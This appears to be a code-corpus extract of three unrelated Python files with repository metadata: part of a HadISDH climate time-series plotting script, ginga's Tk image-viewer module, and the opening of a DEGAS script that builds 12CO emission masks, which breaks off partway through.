# 'Td.2.1.0.2015p_FLATgridPHADPD5by5',
# 'T.2.1.0.2015p_FLATgridIDPHA5by5',
# 'DPD.2.1.0.2015p_FLATgridPHA5by5']
InFilEd = '_'+thenmon+thenyear+'_areaTS_1973'+str(edyr)
#InFilSt = 'ERAclimNBC_5x5_monthly_anomalies_from_daily_both_relax_'
#InFilMd = ['q',
# 'e',
# 'RH',
# 'Tw',
# 'Td',
# 'T',
# 'DPD']
#InFilEd = '_areaTS_19732015'
OUTPLOT='PlotNiceTimeSeries_'+InFilSt+'_'+timetype+'_'+nowmon+nowyear #+version+'_'+timetype+'_'+nowmon+nowyear
# Set up variables
mdi=-1e30
varH=[] # nvars(rows) by mons masked array
uncsHtot=[] # nvars(rows) by mons masked array
uncsHcov=[] # nvars(rows) by mons masked array
uncsHsamp=[] # nvars(rows) by mons masked array
uncsHstat=[] # nvars(rows) by mons masked array
othervarsFULL=[] # nvars(rows) by nothers (max) by mons masked array
othervarsMASK=[] # nvars(rows) by nothers (max) by mons masked array (HadISDH mask too)
#************************************************************************
# Subroutines
#************************************************************************
# READDATA
def ReadData(FileName,typee,delimee,skipee):
''' Use numpy genfromtxt reading to read in all rows from a complex array '''
''' Need to specify format as it is complex '''
''' outputs an array of tuples that in turn need to be subscripted by their names defaults f0...f8 '''
return np.genfromtxt(FileName, dtype=typee,delimiter=delimee,skip_footer=skipee) # ReadData
#************************************************************************
# PlotNiceTimeSeries
def PlotNiceTimeSeries(TheFile,TheHvars,TheUnitees,
TheMCount,TheYCount,TheTimeType,TheStYr,TheEdYr,TheMDI,TheColls,TheParams):
''' Plot a panel for each element of TheHvars '''
''' Add Coverage, Sampling and Station uncertainty ranges '''
''' Add lines for any extra estimates (TheVars) and HadISDH MASKED versions '''
''' Save as png and eps '''
''' TheHvars is a multi-row array: rows for vars, columns for months '''
''' Ditto TheHuncs C=coverage, Sp=sampling, St=station '''
''' TheLablees is the name list for all other vars '''
''' TheUnitees is the units name list '''
''' TheVars is a multirow array if there is 1+ var available - or [] '''
''' TheMASKVars - ditto above but masked to HadISDH coverage '''
''' TheMCount - number of months, TheStYr/EdYr - start and end years '''
''' TheMDI - missing data indicator for masking '''
''' TheColls - dictionary of colours for each dataset '''
# set up number of panels and number of lines
nplots=len(TheParams[:])
print('PLOT NUMBERS: ',nplots)
# nlines=[]
# for n in range(nplots):
# print(n,TheLablees[n][:])
# nlines.append(len(TheLablees[n][:]))
Letteree=[]
Letteree=LetterRange(0,nplots)
# set up x axes
if TheTimeType == 'monthly':
TheMonths=[]
yr=TheStYr
mon=1
for m in range(TheMCount):
TheMonths.append(dt.date(yr,mon,1))
mon=mon+1
if mon == 13:
mon=1
yr=yr+1
TheMonths=np.array(TheMonths)
else:
TheMonths=[]
yr=TheStYr
mon=1
for y in range(TheYCount):
TheMonths.append(dt.date(yr,mon,1))
yr=yr+1
TheMonths=np.array(TheMonths)
xtitlee='Years'
# set up dimensions and plot
xpos=[]
ypos=[]
xfat=[]
ytall=[]
totalyspace=0.90 # start 0.08 end 0.98
totalxspace=0.84 # start 0.12 end 0.98
for n in range(nplots):
xpos.append(0.14)
ypos.append(0.98-((n+1)*(totalyspace/nplots)))
xfat.append(totalxspace)
ytall.append(totalyspace/nplots)
# plt.clf()
# fig = plt.figure(1,figsize=(8,12))
# plt.axes([0.15,0.1,0.8,0.80])
f,axarr=plt.subplots(7,figsize=(6,12),sharex=True) #6,18
for pp in range(nplots):
print('Plot: ',pp,TheParams[pp])
# print(TheHvars[pp,0:10])
# print(TheHuncsC[pp,0:10])
# print(TheHuncsSp[pp,0:10])
# print(TheHuncsSt[pp,0:10])
#axarr[pp].set_size(14)
axarr[pp].set_position([xpos[pp],ypos[pp],xfat[pp],ytall[pp]])
if TheTimeType == 'monthly':
axarr[pp].set_xlim([TheMonths[0],TheMonths[TheMCount-1]])
else:
axarr[pp].set_xlim([TheMonths[0],TheMonths[TheYCount-1]])
# axarr[pp].set_ylim([math.floor(min(TheHvars[pp,:]-TheHuncsC[pp,:])),
# math.ceil(max(TheHvars[pp,:]+TheHuncsC[pp,:]))])
# if len(TheHuncsC[pp,:]) > 0:
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsC[pp,:],TheHvars[pp,:]-TheHuncsC[pp,:],
# facecolor='LightGray',edgecolor='none')
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsSp[pp,:],TheHvars[pp,:]-TheHuncsSp[pp,:],
# facecolor='LightSlateGray',edgecolor='none')
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsSt[pp,:],TheHvars[pp,:]-TheHuncsSt[pp,:],
# facecolor='LightSlateGray',edgecolor='none')
if timetype == 'monthly':
axarr[pp].plot(TheMonths,TheHvars[pp,:],c='black',linewidth=0.5)
else:
axarr[pp].plot(TheMonths,TheHvars[pp,:],c='black',linewidth=2)
axarr[pp].annotate(Letteree[pp]+') '+TheParams[pp],xy=(0.03,0.9),xycoords='axes fraction',size=10)
# get the decadal linear trend and annotate
TrendStats=np.empty(3)
TrendStats=MedianPairwise(TheHvars[pp,:],TheMDI,TrendStats)
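        # scale the per-timestep slope to a per-decade trend: x120 for monthly
        # series, x10 for annual series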
if (timetype == 'monthly'):
TrendStats=np.array(TrendStats)*120.
else:
TrendStats=np.array(TrendStats)*10.
trendlinstr='{0:5.2f}'.format(TrendStats[0])+' ('+'{0:5.2f}'.format(TrendStats[1])+' to '+'{0:5.2f}'.format(TrendStats[2])+') '+'{:s}'.format(TheUnitees[pp])+' decade$^{-1}$'
axarr[pp].annotate(trendlinstr,xy=(0.14,0.9),xycoords='axes fraction',color='black',size=10)
# for ll in range(nlines[pp]): # no problem if 0
# print('Other: ',ll,TheLablees[pp][ll])
## axarr[pp].plot(TheMonths,TheVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=0.5)
## axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linestyle='dotted',linewidth=0.5)
# if timetype == 'monthly':
# axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=0.5)
# else:
# axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=2)
#
# axarr[pp].annotate(TheLablees[pp][ll],xy=(0.14,0.82-(ll*0.08)),xycoords='axes fraction',
# color=TheColls[TheLablees[pp][ll]],size=10)
axarr[pp].set_ylabel(TheUnitees[pp],fontsize=10)
if TheTimeType == 'monthly':
axarr[pp].hlines(0,TheMonths[0],TheMonths[TheMCount-1],color='black')
else:
axarr[pp].hlines(0,TheMonths[0],TheMonths[TheYCount-1],color='black')
axarr[nplots-1].set_xlabel(xtitlee,fontsize=10)
# Figure Watermark and Labels
# watermarkstring="/".join(os.getcwd().split('/')[4:])+'/'+os.path.basename( __file__ )+" "+dt.datetime.strftime(dt.datetime.now(), "%d-%b-%Y %H:%M")
# plt.figtext(0.01,0.01,watermarkstring,size=6)
#plt.show()
plt.savefig(TheFile+".eps")
plt.savefig(TheFile+".png")
    return # PlotNiceTimeSeries
#************************************************************************
# MAIN PROGRAM
#************************************************************************
# set up loops to read in all time series
if timetype == 'monthly':
varH=np.zeros((nparams,nmons))
uncsHcov=np.zeros((nparams,nmons))
uncsHsamp=np.zeros((nparams,nmons))
uncsHstat=np.zeros((nparams,nmons))
uncsHtot=np.zeros((nparams,nmons))
othervarsFULL=np.zeros((nparams,3,nmons))
othervarsMASK=np.zeros((nparams,3,nmons))
else:
varH=np.zeros((nparams,nyrs))
uncsHcov=np.zeros((nparams,nyrs))
uncsHsamp=np.zeros((nparams,nyrs))
uncsHstat=np.zeros((nparams,nyrs))
uncsHtot=np.zeros((nparams,nyrs))
othervarsFULL=np.zeros((nparams,3,nyrs))
othervarsMASK=np.zeros((nparams,3,nyrs))
varH[:,:]=mdi
uncsHcov[:,:]=mdi
uncsHsamp[:,:]=mdi
uncsHstat[:,:]=mdi
uncsHtot[:,:]=mdi
othervarsFULL[:,:,:]=mdi
othervarsMASK[:,:,:]=mdi
for nv in range(nparams):
tmpvar=[]
tmpvarUcov=[]
tmpvarUsamp=[]
tmpvarUstat=[]
tmpvarUtot=[]
print('Reading in: ',param2[nv])
# read in HadISDH time series
if IfType == '.nc':
MyNCFile=DATADIR+InFilSt+param2[nv]+InFilMd+InFilEd+'.nc'
#MyNCFile=DATADIR+INHFILEST+param2[nv]+'.'+version+'_FLATgrid'+homogtype[nv]+INHFILEED+'.nc'
f=netcdf.netcdf_file(MyNCFile,'r')
if param[nv]=='q':
var=f.variables['glob_q_anoms']
elif param[nv]=='e':
var=f.variables['glob_e_anoms']
elif param[nv]=='rh':
var=f.variables['glob_RH_anoms']
elif param[nv]=='t':
var=f.variables['glob_T_anoms']
elif param[nv]=='tw':
var=f.variables['glob_Tw_anoms']
elif param[nv]=='td':
var=f.variables['glob_Td_anoms']
elif param[nv]=='dpd':
var=f.variables['glob_DPD_anoms']
tmpvar=np.array(var.data)
f.close()
else: # its a text file
MyDatFile=DATADIR+INHFILEST+param2[nv]+INHFILEED
MyTypes=("|S10","float","float","float","float","float")
MyDelimiters=[10,10,10,10,10,10]
MySkips=1
RawData=ReadData(MyDatFile,MyTypes,MyDelimiters,MySkips)
tmpvar=np.array(RawData['f1'])
tmpvarUcov=np.array(RawData['f3'])
tmpvarUsamp=np.array(RawData['f2'])
tmpvarUstat=np.array(RawData['f4'])
tmpvarUtot=np.array(RawData['f5'])
# If working on annuals then make annual averages
if timetype == 'annual':
newtmpvar = np.zeros(nyrs)
tmpvar = np.reshape(tmpvar,(nyrs,12))
for yy in range(nyrs):
newtmpvar[yy] = np.mean(tmpvar[yy,:])
tmpvar = 0
tmpvar = copy.copy(newtmpvar)
newtmpvar = 0
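# Illustrative note (not part of the original script): with no missing
# months, the loop above collapses to a single vectorised reduction:
#   tmpvar = np.reshape(tmpvar, (nyrs, 12)).mean(axis=1)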
# If HadISDH_land and climatology not 1981-2010 then rezero HadISDH to climatology - ASSUME NO MISSING DATA!!!
if (InFilSt == 'HadISDH.land') & ((climst != 1981) | (climed != 2010)):
print('Renorming...')
if timetype == 'monthly':
tmpvar=np.reshape(tmpvar,(nyrs,12))
for mm in range(12):
subarr=tmpvar[:,mm]
climarr=subarr[stcl:edcl]
subarr[:]=subarr[:]-np.mean(climarr)
tmpvar[:,mm]=subarr[:]
varH[nv,:]=np.reshape(tmpvar,(1,nmons))
else:
climarr=tmpvar[stcl:edcl]
tmpvar[:]=tmpvar[:]-np.mean(climarr)
varH[nv,:]=np.reshape(tmpvar,(1,nyrs))
else:
varH[nv,:]=copy.copy(tmpvar)
# if len(tmpvarUcov) > 0:
# uncsHcov[nv,:]=tmpvarUcov
# uncsHsamp[nv,:]=tmpvarUsamp
# uncsHstat[nv,:]=tmpvarUstat
# uncsHtot[nv,:]=tmpvarUtot
## read in all other time series
# for no in range(len(others[nv][:])):
# print('Reading in others: ',no,others[nv][no])
# MyNCFile=DATADIR+others[nv][no]+'_'+param2[nv]+INOTHFULL+'.nc'
# f=netcdf.netcdf_file(MyNCFile,'r')
# var=f.variables['glob_anoms']
# newvar=np.array(var.data)
# f.close()
# if timetype == 'annual':
# newvar=np.reshape(newvar,(nyrs,12))
# for yy in range(nyrs):
# if newvar[yy,0] > mdi:
# othervarsFULL[nv,no,yy]=np.mean(newvar[yy,:])
# else:
# othervarsFULL[nv,no,:]=np.reshape(newvar,(1,nmons))#
#
# MyNCFile=DATADIR+others[nv][no]+'_'+param2[nv]+INOTHMASK+'.nc'
# f=netcdf.netcdf_file(MyNCFile,'r')
# var=f.variables['glob_anoms']
# newvar=np.array(var.data)
# f.close()
# if timetype == 'annual':
# newvar=np.reshape(newvar,(nyrs,12))
# for yy in range(nyrs):
# if newvar[yy,0] > mdi:
# othervarsMASK[nv,no,yy]=np.mean(newvar[yy,:])
# else:
# othervarsMASK[nv,no,:]=np.reshape(newvar,(1,nmons))
# convert to masked arrays and mask out missing data
print('Masking')
varH=np.ma.masked_array(varH)
varH[varH <= mdi]=np.ma.masked
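# Minimal sketch of the mdi masking pattern (values assumed, illustration only):
#   arr = np.ma.masked_array([0.5, -1e30, 0.7])
#   arr[arr <= -1e30] = np.ma.masked   # flagged points drop out of later stats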
#uncsHcov=np.ma.masked_array(uncsHcov)
#uncsHcov[uncsHcov <= mdi]=np.ma.masked
#uncsHsamp=np.ma.masked_array(uncsHsamp)
#uncsHsamp[uncsHsamp <= mdi]=np.ma.masked
#uncsHstat=np.ma.masked_array(uncsHstat)
#uncsHstat[uncsHstat <= mdi]=np.ma.masked
#uncsHtot=np.ma.masked_array(uncsHtot)
#uncsHtot[uncsHtot <= mdi]=np.ma.masked
#othervarsFULL=np.ma.masked_array(othervarsFULL)
#othervarsFULL[othervarsFULL <= mdi]=np.ma.masked
#othervarsMASK=np.ma.masked_array(othervarsMASK)
#othervarsMASK[othervarsMASK <= mdi]=np.ma.masked
## sort out in quadrature quantities for uncs where
## uncsHcov is total combined in quadrature
## uncsHsamp is uncsHstat+uncsHsamp quadrature contributions
## uncsHstat is uncsHstat quadrature contribution
#print('Sorting out Uncs...')
#for nv in range(nparams):
# RatsSamp=[]
# RatsStat=[]
# RatsSamp=(uncsHsamp[nv,:]**2)/((uncsHcov[nv,:]**2)+(uncsHsamp[nv,:]**2)+(uncsHstat[nv,:]**2))
# RatsStat=(uncsHstat[nv,:]**2)/((uncsHcov[nv,:]**2)+(uncsHsamp[nv,:]**2)+(uncsHstat[nv,:]**2))
# print(len(RatsSamp),len(RatsStat))
# uncsHcov[nv,:]=uncsHtot[nv,:]
# uncsHsamp[nv,:]=(uncsHtot[nv,:]*RatsSamp[:])+(uncsHtot[nv,:]*RatsStat[:])
# uncsHstat[nv,:]=uncsHtot[nv,:]*RatsStat[:]
# set up colour dictionary - so that each dataset has an associated colour
diccols={}
#diccols[sourceslist[0]]='Red'
#diccols[sourceslist[1]]='MediumBlue'
#diccols[sourceslist[2]]='DarkOrange'
#diccols[sourceslist[3]]='MediumSlateBlue'
# call plotter
print('Plotting...')
MyFile=PLOTDIR+OUTPLOT
#PlotNiceTimeSeries(MyFile,varH,uncsHcov,uncsHsamp,uncsHstat,
# others,unitees,othervarsFULL,othervarsMASK,
# nmons,nyrs,timetype,styr,edyr,mdi,
# diccols,param2)
lablees=['a','b','c','d','e','f','g'] # panel letters (defined but not passed to the call below)
PlotNiceTimeSeries(MyFile,varH,unitees,nmons,nyrs,timetype,styr,edyr,mdi,
diccols,param2)
# stop()
print("And, we are done!")
|
Kate-Willett/Climate_Explorer
|
PYTHON/PlotNiceTimeSeries_APR2016.py
|
Python
|
cc0-1.0
| 16,514
|
[
"NetCDF"
] |
da621d9e006d79ff8e80e446359a12df208b256a8b495cdb04ac3b57e089447f
|
#
# ImageViewTk.py -- classes for the display of FITS files in Tk surfaces
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
import numpy
import PIL.Image as PILimage
import PIL.ImageTk as PILimageTk
from ginga import Mixins, Bindings, colors
from ginga.canvas.mixins import DrawingMixin, CanvasMixin, CompoundMixin
from ginga.util.toolbox import ModeIndicator
try:
# See if we have aggdraw module--best choice
from ginga.aggw.ImageViewAgg import ImageViewAgg as ImageView, \
ImageViewAggError as ImageViewError
except ImportError:
try:
# No, hmm..ok, see if we have opencv module...
from ginga.cvw.ImageViewCv import ImageViewCv as ImageView, \
ImageViewCvError as ImageViewError
except ImportError:
try:
# No dice. How about the PIL module?
from ginga.pilw.ImageViewPil import ImageViewPil as ImageView, \
ImageViewPilError as ImageViewError
except ImportError:
# Fall back to mock--there will be no graphic overlays
from ginga.mockw.ImageViewMock import ImageViewMock as ImageView, \
ImageViewMockError as ImageViewError
class ImageViewTkError(ImageViewError):
pass
class ImageViewTk(ImageView):
def __init__(self, logger=None, rgbmap=None, settings=None):
ImageView.__init__(self, logger=logger,
rgbmap=rgbmap,
settings=settings)
self.tkcanvas = None
self.tkphoto = None
self.msgtask = None
# see reschedule_redraw() method
self._defer_task = None
def set_widget(self, canvas):
"""Call this method with the Tkinter canvas that will be used
for the display.
"""
self.tkcanvas = canvas
canvas.bind("<Configure>", self._resize_cb)
width = canvas.winfo_width()
height = canvas.winfo_height()
self.configure_window(width, height)
def get_widget(self):
return self.tkcanvas
def update_image(self):
if self.tkcanvas is None:
return
cr = self.tkcanvas
# remove all old items from the canvas
items = cr.find_all()
for item in items:
cr.delete(item)
wd, ht = self.get_window_size()
# Get surface as a numpy array
surface = self.get_surface()
if isinstance(surface, numpy.ndarray):
arr8 = surface
else:
# frombuffer is the non-deprecated replacement for numpy.fromstring here
arr8 = numpy.frombuffer(surface.tostring(), dtype=numpy.uint8)
arr8 = arr8.reshape((ht, wd, 4))
# make a Tk photo image and stick it to the canvas
image = PILimage.fromarray(arr8)
photo = PILimageTk.PhotoImage(image)
# hang on to a reference otherwise it gets gc'd
self.tkphoto = photo
cr.create_image(0, 0, anchor='nw', image=photo)
# is this necessary?
cr.config(scrollregion=cr.bbox('all'))
def reschedule_redraw(self, time_sec):
if self.tkcanvas is not None:
try:
self.tkcanvas.after_cancel(self._defer_task)
except Exception:
pass
time_ms = int(time_sec * 1000)
self._defer_task = self.tkcanvas.after(time_ms,
self.delayed_redraw)
def configure_window(self, width, height):
self.configure_surface(width, height)
def _resize_cb(self, event):
self.configure_window(event.width, event.height)
def set_cursor(self, cursor):
if self.tkcanvas is None:
return
self.tkcanvas.config(cursor=cursor)
def onscreen_message(self, text, delay=None):
if self.tkcanvas is None:
return
if self.msgtask:
try:
self.tkcanvas.after_cancel(self.msgtask)
except Exception:
pass
self.message = text
self.redraw(whence=3)
if delay:
ms = int(delay * 1000.0)
self.msgtask = self.tkcanvas.after(ms,
lambda: self.onscreen_message(None))
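# Usage sketch for the widget wiring above (illustrative only, not taken
# from the ginga docs; assumes a logger object and plain Tkinter):
#   import Tkinter as tk   # 'tkinter' on Python 3
#   root = tk.Tk()
#   canvas = tk.Canvas(root, width=512, height=512, bg='black')
#   canvas.pack()
#   viewer = ImageViewTk(logger=mylogger)
#   viewer.set_widget(canvas)
#   root.mainloop()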
class ImageViewEvent(ImageViewTk):
def __init__(self, logger=None, rgbmap=None, settings=None):
ImageViewTk.__init__(self, logger=logger, rgbmap=rgbmap,
settings=settings)
# last known window mouse position
self.last_win_x = 0
self.last_win_y = 0
# last known data mouse position
self.last_data_x = 0
self.last_data_y = 0
# Does widget accept focus when mouse enters window
self.follow_focus = True
self._button = 0
# @$%&^(_)*&^ tk!!
self._keytbl = {
'shift_l': 'shift_l',
'shift_r': 'shift_r',
'control_l': 'control_l',
'control_r': 'control_r',
'alt_l': 'alt_l',
'alt_r': 'alt_r',
'super_l': 'super_l',
'super_r': 'super_r',
'meta_right': 'meta_right',
'asciitilde': '~',
'grave': 'backquote',
'exclam': '!',
'at': '@',
'numbersign': '#',
'percent': '%',
'asciicircum': '^',
'ampersand': '&',
'asterisk': '*',
'dollar': '$',
'parenleft': '(',
'parenright': ')',
'underscore': '_',
'minus': '-',
'plus': '+',
'equal': '=',
'braceleft': '{',
'braceright': '}',
'bracketleft': '[',
'bracketright': ']',
'bar': '|',
'colon': ':',
'semicolon': ';',
'quotedbl': 'doublequote',
'apostrophe': 'singlequote',
'backslash': 'backslash',
'less': '<',
'greater': '>',
'comma': ',',
'period': '.',
'question': '?',
'slash': '/',
'space': 'space',
'escape': 'escape',
'return': 'return',
'tab': 'tab',
'f1': 'f1',
'f2': 'f2',
'f3': 'f3',
'f4': 'f4',
'f5': 'f5',
'f6': 'f6',
'f7': 'f7',
'f8': 'f8',
'f9': 'f9',
'f10': 'f10',
'f11': 'f11',
'f12': 'f12',
}
# Define cursors for pick and pan
#hand = openHandCursor()
hand = 'fleur'
self.define_cursor('pan', hand)
cross = 'cross'
self.define_cursor('pick', cross)
for name in ('motion', 'button-press', 'button-release',
'key-press', 'key-release', 'drag-drop',
'scroll', 'map', 'focus', 'enter', 'leave',
):
self.enable_callback(name)
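# Sketch of hooking one of the callbacks enabled above (callback names and
# signature assumed from ginga's Callback mixin; illustration only):
#   def on_motion(viewer, button, data_x, data_y):
#       print('cursor at', data_x, data_y)
#   viewer.add_callback('motion', on_motion)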
def set_widget(self, canvas):
super(ImageViewEvent, self).set_widget(canvas)
canvas.bind("<Enter>", self.enter_notify_event)
canvas.bind("<Leave>", self.leave_notify_event)
canvas.bind("<FocusIn>", lambda evt: self.focus_event(evt, True))
canvas.bind("<FocusOut>", lambda evt: self.focus_event(evt, False))
canvas.bind("<KeyPress>", self.key_press_event)
canvas.bind("<KeyRelease>", self.key_release_event)
#canvas.bind("<Map>", self.map_event)
# scroll events in tk are overloaded into the button press events
canvas.bind("<ButtonPress>", self.button_press_event)
canvas.bind("<ButtonRelease>", self.button_release_event)
canvas.bind("<Motion>", self.motion_notify_event)
# TODO: Set up widget as a drag and drop destination
return self.make_callback('map')
def transkey(self, keyname):
self.logger.debug("key name in tk '%s'" % (keyname))
try:
return self._keytbl[keyname.lower()]
except KeyError:
return keyname
def get_keyTable(self):
return self._keytbl
def set_follow_focus(self, tf):
self.follow_focus = tf
def focus_event(self, event, hasFocus):
return self.make_callback('focus', hasFocus)
def enter_notify_event(self, event):
if self.follow_focus:
self.tkcanvas.focus_set()
return self.make_callback('enter')
def leave_notify_event(self, event):
self.logger.debug("leaving widget...")
return self.make_callback('leave')
def key_press_event(self, event):
# without this we do not get key release events if the focus
# changes to another window
self.tkcanvas.grab_set_global()
keyname = event.keysym
keyname = self.transkey(keyname)
self.logger.debug("key press event, key=%s" % (keyname))
return self.make_ui_callback('key-press', keyname)
def key_release_event(self, event):
self.tkcanvas.grab_release()
keyname = event.keysym
keyname = self.transkey(keyname)
self.logger.debug("key release event, key=%s" % (keyname))
return self.make_ui_callback('key-release', keyname)
def button_press_event(self, event):
x = event.x; y = event.y
button = 0
if event.num != 0:
# some kind of weird convention for scrolling, shoehorned into
# Tk, I guess
if event.num in (4, 5):
direction = 0.0 # up
if event.num == 5:
# down
direction = 180.0
# 15 deg is standard 1-click turn for a wheel mouse
numDegrees = 15.0
self.logger.debug("scroll deg=%f direction=%f" % (
numDegrees, direction))
data_x, data_y = self.get_data_xy(x, y)
self.last_data_x, self.last_data_y = data_x, data_y
return self.make_ui_callback('scroll', direction, numDegrees,
data_x, data_y)
button |= 0x1 << (event.num - 1)
self._button = button
self.logger.debug("button event at %dx%d, button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
return self.make_ui_callback('button-press', button, data_x, data_y)
def button_release_event(self, event):
# event.button, event.x, event.y
x = event.x; y = event.y
button = 0
if event.num != 0:
if event.num in (4, 5):
return False
button |= 0x1 << (event.num - 1)
self._button = 0
self.logger.debug("button release at %dx%d button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
return self.make_ui_callback('button-release', button, data_x, data_y)
def get_last_win_xy(self):
return (self.last_win_x, self.last_win_y)
def get_last_data_xy(self):
return (self.last_data_x, self.last_data_y)
def motion_notify_event(self, event):
#button = 0
button = self._button
x, y = event.x, event.y
self.last_win_x, self.last_win_y = x, y
# num = event.num
# if num == 1:
# button |= 0x1
# elif num == 2:
# button |= 0x2
# elif num == 3:
# button |= 0x4
self.logger.debug("motion event at %dx%d, button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
self.last_data_x, self.last_data_y = data_x, data_y
return self.make_ui_callback('motion', button, data_x, data_y)
## def drop_event(self, widget, context, x, y, selection, targetType,
## time):
## if targetType != self.TARGET_TYPE_TEXT:
## return False
## paths = selection.data.split('\n')
## self.logger.debug("dropped filename(s): %s" % (str(paths)))
## return self.make_ui_callback('drag-drop', paths)
class ImageViewZoom(Mixins.UIMixin, ImageViewEvent):
# class variables for binding map and bindings can be set
bindmapClass = Bindings.BindingMapper
bindingsClass = Bindings.ImageViewBindings
@classmethod
def set_bindingsClass(cls, klass):
cls.bindingsClass = klass
@classmethod
def set_bindmapClass(cls, klass):
cls.bindmapClass = klass
def __init__(self, logger=None, rgbmap=None, settings=None,
bindmap=None, bindings=None):
ImageViewEvent.__init__(self, logger=logger, rgbmap=rgbmap,
settings=settings)
Mixins.UIMixin.__init__(self)
self.ui_setActive(True)
if bindmap is None:
bindmap = ImageViewZoom.bindmapClass(self.logger)
self.bindmap = bindmap
bindmap.register_for_events(self)
if bindings is None:
bindings = ImageViewZoom.bindingsClass(self.logger)
self.set_bindings(bindings)
def get_bindmap(self):
return self.bindmap
def get_bindings(self):
return self.bindings
def set_bindings(self, bindings):
self.bindings = bindings
bindings.set_bindings(self)
class CanvasView(ImageViewZoom):
def __init__(self, logger=None, settings=None, rgbmap=None,
bindmap=None, bindings=None):
ImageViewZoom.__init__(self, logger=logger, settings=settings,
rgbmap=rgbmap,
bindmap=bindmap, bindings=bindings)
# Needed for UIMixin to propagate events correctly
self.objects = [self.private_canvas]
def set_canvas(self, canvas, private_canvas=None):
super(CanvasView, self).set_canvas(canvas,
private_canvas=private_canvas)
self.objects[0] = self.private_canvas
class ImageViewCanvasError(ImageViewTkError):
pass
class ImageViewCanvas(ImageViewZoom,
DrawingMixin, CanvasMixin, CompoundMixin):
def __init__(self, logger=None, rgbmap=None, settings=None,
bindmap=None, bindings=None):
ImageViewZoom.__init__(self, logger=logger,
rgbmap=rgbmap,
settings=settings,
bindmap=bindmap,
bindings=bindings)
CompoundMixin.__init__(self)
CanvasMixin.__init__(self)
DrawingMixin.__init__(self)
# we are both a viewer and a canvas
self.set_canvas(self, private_canvas=self)
self._mi = ModeIndicator(self)
#END
|
eteq/ginga
|
ginga/tkw/ImageViewTk.py
|
Python
|
bsd-3-clause
| 14,732
|
[
"FLEUR"
] |
dd489685af67b5b22ee0cc18f29ff1d821c143b34fcbe9898eb6d6482da7ea73
|
# Purpose: make masks based on 12CO ancillary data for data reduction
# and analysis.
# Date Programmer Description of Changes
# ----------------------------------------------------------------------
# 4/14/2020 A.A. Kepley Original Code
# 4/8/2021 A.A. Kepley Updated to include phangs and new hera data
import os
from degas.masking import cubemask
from degas.products import makeMap
#import degas
from astropy.table import Table, Column
import glob
import numpy as np
from spectral_cube import SpectralCube
# set desired mask parameters
peakCut = 5.0
lowCut = 3.0
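# peakCut/lowCut implement the usual two-threshold masking scheme: seed the
# mask where emission exceeds peakCut*rms, then grow each seeded region down
# to lowCut*rms. A minimal numpy/scipy sketch of the idea (illustrative only,
# not the degas.masking implementation):
#   from scipy import ndimage
#   seed = data > peakCut * rms
#   low = data > lowCut * rms
#   labels, nreg = ndimage.label(low)
#   keep = np.unique(labels[seed])
#   mask = np.isin(labels, keep[keep > 0])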
# set up the relevant directories
analysisDir = os.environ['ANALYSISDIR']
scriptDir = os.environ['SCRIPTDIR']
maskDir = os.path.join(analysisDir,'CO')
if not os.path.exists(maskDir):
os.mkdir(maskDir)
otherDataDir = os.path.join(analysisDir,'ancillary_data')
#otherDataDir = os.environ['OTHERDATA']
# get list of galaxies in degas DR1
degas_table = Table.read(os.path.join(scriptDir,"degas_base.fits"))
# create a column for logging masks.
if 'MASK' in degas_table.colnames:
degas_table.remove_column('MASK')
degas_table.add_column(Column(np.full_like(degas_table['NAME'],''),dtype='S25'),name='MASK')
idx_dr1 = degas_table['DR1'] == 1
#idx_dr1 = degas_table['NAME'] == 'NGC4038'
# Extract list of galaxies via fancy list comprehension
# phangs
phangs_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'phangs','*10kms_gauss15.fits'))]
# heracles
heracles_list = [os.path.basename(image).split('_')[0] for image in glob.glob(os.path.join(otherDataDir,'heracles','*gauss15_fixed_kms.fits'))]
# everyHeracles (from Adam)
extra_hera_adam_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'everyHeracles_fromadam_20210318','*10kms_gauss15.fits'))]
# everyHERACLES
extra_hera_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'co_from_andreas','*.cube.fits'))]
# bima song
bima_list = [ os.path.basename(image).split('_')[0] for image in glob.glob(os.path.join(otherDataDir,'bima_song','*gauss15_fixed.fits'))]
# OVRO
ovro_list = [ os.path.basename(image).split('.')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'temp_co','*co.cmmsk_gauss15_fixed.fits'))]
for galaxy in degas_table[idx_dr1]:
generateMoments = True
#for IC 0342 use Jialu's 12CO
if galaxy['NAME'] == 'IC0342':
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'jialu',
'ic0342_regrid_12co_cube_Tmb_10kms_gauss15.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
threeD=True,
minBeamFrac=1.5,
minNchan=5.0)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'GBT'
## use phangs first
elif galaxy['NAME'] in phangs_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'phangs',
galaxy['NAME'].lower() + '_12m+7m+tp_co21_10kms_gauss15.fits')
## works for NGC2903 and NGC3521 and NGC4569
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut, lowCut=lowCut,
minBeamFrac=2.0,
minNchan=3.0)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'PHANGS'
## use heracles second
elif galaxy['NAME'] in heracles_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'heracles',
galaxy['NAME']+'_heracles_gauss15_fixed_kms.fits')
